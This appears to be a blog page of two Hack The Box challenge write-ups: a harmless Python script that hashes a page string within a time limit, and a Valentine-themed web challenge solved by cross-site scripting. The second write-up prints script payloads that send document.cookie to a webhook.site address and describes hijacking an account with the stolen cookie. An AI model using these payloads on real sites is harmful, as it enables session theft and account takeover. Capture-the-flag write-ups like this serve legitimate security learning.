N31tP8H

Tag: Challenge

  • Emdee five for life

    Summary

    In this Hack The Box challenge, you’ll sharpen your Python skills. Your task is to write a Python script that connects to a service, extracts a specific string, calculates its MD5 hash, and sends the hash back, all within a single session and a strict time limit.

    Write-Up

    We first try to send the Md5 hash of the string back with this command

    echo '<String>' | md5sum

    But instead we got a mocking message and another string

    Analyze the response we can see that the website only allow us 5 seconds to get the string, hash it and send it back, all within the same session.

    So I wrote this python script to get the flag:

    import sys
import requests
from bs4 import BeautifulSoup
import hashlib

if len(sys.argv) <= 1:
    print("Usage: " + sys.argv[0] + " http://URL")
    sys.exit(1)
else:
    url = sys.argv[1]

# Send the first GET request with Persistent session
session=requests.session()
response = session.get(url)

# Extract the string
soup = BeautifulSoup(response.text, "html.parser")
h3 = soup.find("h3",{"align": "center"})

# MD5 hash the string
hash=hashlib.md5((h3.get_text(strip=True)).encode()).hexdigest()


# Make the POST payload
payload = {
        "hash": hash
        }

# Send the payload
response2 = session.post(url, data=payload)

# Extract the Flag from the response
soup2 = BeautifulSoup(response2.text, "html.parser")
print(soup2)
flag = soup2.find("p", {"align":"center"})


print("Flag: " + flag.get_text(strip=True))

    Note: there might be some delay between you and the server so run it again if it doesn’t work the first time.

  • OnlyHacks

    Summary

    This Valentine’s-themed web challenge focuses on exploiting Cross-Site Scripting (XSS) to steal a cookie, hijack an account, and retrieve the flag.

    Write-up

    This image has an empty alt attribute; its file name is image.png

    The login page appears resistant to basic SQL injection and authentication bypass attempts.

    We will move on with the Sign Up function.

    This image has an empty alt attribute; its file name is image-1.png

    The signup process, however, requires a profile picture upload, which presents a potential vulnerability.

    Moving on the the Dashboard.

    This image has an empty alt attribute; its file name is image-2.png

    Upon reaching the dashboard, swiping through profiles reveals usernames, not nicknames, as indicated in dashboard.js. This suggests two possible attack vectors: XSS within the chat functionality or exploiting a web Large Language Model (LLM) integrated into the chatbot.

    This image has an empty alt attribute; its file name is image-3-1024x538.png
    This image has an empty alt attribute; its file name is image-4.png

    I initially pursued the web LLM angle, influenced by my experience with tools like ChatGPT and Gemini. However, this proved to be a misdirection. The challenge actually involves a simpler XSS vulnerability.

    Let try some basic XXS with:

    <script>alert(1)</script>

    This image has an empty alt attribute; its file name is image-5-1024x536.png

    We’ve confirmed the XSS vulnerability. Now, let’s craft a payload to steal cookies.

    <script>fetch('https://webhook.site/b7e66...',{method: 'POST', mode: 'no-cors', body:document.cookie}); </script>

    Or

    <script>document.location="https://webhook.site/b7e66.../?cookie="+document.cookie</script>

    This image has an empty alt attribute; its file name is image-6.png

    Replace the cookie we got and refresh the page to get the flag.

    This image has an empty alt attribute; its file name is image-7.png